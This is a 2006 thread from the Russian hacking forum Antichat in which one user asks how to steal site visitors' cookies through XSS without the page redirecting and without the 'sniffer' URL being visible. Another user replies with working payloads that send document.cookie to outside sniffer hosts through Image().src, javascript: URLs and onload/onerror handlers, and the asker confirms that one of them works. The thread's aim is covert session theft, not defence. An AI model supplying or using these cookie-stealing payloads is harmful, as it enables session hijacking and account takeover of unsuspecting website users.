ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Функции с xss
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Функции с xss
  #1  
Старый 07.05.2006, 02:44
Аватар для alex-19841
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию Функции с xss
onload='document.location="http://xss.ru/coc.gif?;"+document.cookie'
этот использует функцию onload
также можно
onmouseover
onmoseout
onerror
и т.д
Но проблема со всеми то что, как страница открывается или когда наводишь курсор на картинку то браузер переходит на страницу которую указал в document.location
Как сделать так, чтобы оставалась таже странице но - никуда не перебрасывало но http://xss.ru/coc.gif?;"+document.cookie срабатывало?
Также прочитал http://forum.antichat.ru/thread18719-xss.html
Пробовал закодировать свой http://xss.ru/coc.gif?;"+document.cookie
в base 64
aHR0cDovL3hzcy5ydS9jb2MuZ2lmPzsiK2RvY3VtZW50LmNvb2 tpZQ==
и когда это встовлял в
onload='document.location="aHR0cDovL3hzcy5ydS9jb2M uZ2lmPzsiK2RvY3VtZW50LmNvb2tpZQ=='
То сниффер не срабатывал.
Чем можно это закодировать, чтоб снифер работал, при этом ссылки сниффера видно не было?
Последний раз редактировалось alex-19841; 07.05.2006 в 02:46..
 
Ответить с цитированием

  #2  
Старый 07.05.2006, 04:14
Аватар для CinerX
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию
Попробуй через картинку...
<script>
img = new Image()
img.src = "адресс_снифака"+document.cookie;
</script>

Цитата:
Чем можно это закодировать, чтоб снифер работал, при этом ссылки сниффера видно не было?
так ты не кодируй http:// и слеши тоже =))) И тогда все будет работать =)
 
Ответить с цитированием

  #3  
Старый 07.05.2006, 06:30
Аватар для alex-19841
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
Script не могу использовать - фильтруется.
Пробовал закодировать
http://xss.ru/coc.gif?;"+document.cookie в
http://eHNzLnJ1/Y29jLmdpZg==?;"+ZG9jdW1lbnQuY29va2ll
Не пашет.
 
Ответить с цитированием

  #4  
Старый 07.05.2006, 06:37
Аватар для alex-19841
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
P.s
Кто чем кодирует и как?
 
Ответить с цитированием

  #5  
Старый 07.05.2006, 09:13
Аватар для alex-19841
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
Все с проблемой вылета новой страници разобрался, осталось кодировка
 
Ответить с цитированием

  #6  
Старый 14.05.2006, 13:04
Аватар для alex-19841
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
Помогите очень, очень надо
(javascript:document.location='http://site.ru/snf.gif?;'+document.cookie)
Открывается в новом окне, как сделать чтоб это срабатывало как картинка и не перескакивало на другую страницу
чета типо
(javascript:image.src='http://site.ru/snf.gif?;'+document.cookie) - только это не работает
Зарание благодарен.
 
Ответить с цитированием

  #7  
Старый 14.05.2006, 13:16
Аватар для CinerX
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию
Код:
(javascript:img=new Image();img.src="http://site.ru/snf.gif?"+document.cookie)
 
Ответить с цитированием

  #8  
Старый 14.05.2006, 13:42
Аватар для alex-19841
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
CinerX
Не срабатыват
 
Ответить с цитированием

  #9  
Старый 14.05.2006, 14:15
Аватар для CinerX
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию
Хм... странно...
поробуй тогда так:
Код:
javascript:img=new%20Image();img.src="http://site.ru/snf.gif?"+document.cookie
И вот еще один пример, но он работает только в том случае если есть хоть одна картинка на странице в которую ты будешь совать снифер:
Код:
javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
 
Ответить с цитированием

  #10  
Старый 15.05.2006, 05:35
Аватар для alex-19841
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию
CinerX
+5
Цитата:
javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
Сработало.
Спасибо
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Админка для любителей Xss атак Jenizix Доступы, shells, ftp - Покупка, продажа 4 09.01.2007 10:46
Xss — основные ходы dinar_007 Чужие Статьи 11 30.05.2006 17:00
chat.chiki-puki.ru - возможно ли сломать? artkino Чаты 22 07.03.2006 00:07
Xss на yandex.ru Pridu_ROCK Уязвимости 1 04.03.2006 01:08
XSS в Phorum<=5.0.14 tester2005 Уязвимости 22 17.03.2005 07:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ